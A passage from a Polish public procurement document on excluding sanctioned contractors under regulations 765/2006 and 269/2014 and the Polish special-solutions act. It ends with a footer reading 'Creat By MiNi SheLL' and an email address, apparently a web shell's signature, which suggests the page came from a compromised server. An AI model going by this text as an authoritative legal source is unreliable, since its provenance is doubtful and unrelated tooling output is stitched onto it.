poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/> rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został<br/> wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art.<br/> 1 pkt 3. Ustawy o szczególnych rozwiązaniach .<br/> 4.2. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia o<br/> których mowa w art. 7 ust. 1 ustawy o szczególnych rozwiązaniach Zamawiający nie wymaga żadnych podmiotowych<br/> środków dowodowych

Creat By MiNi SheLL
Email: jattceo@gmail.com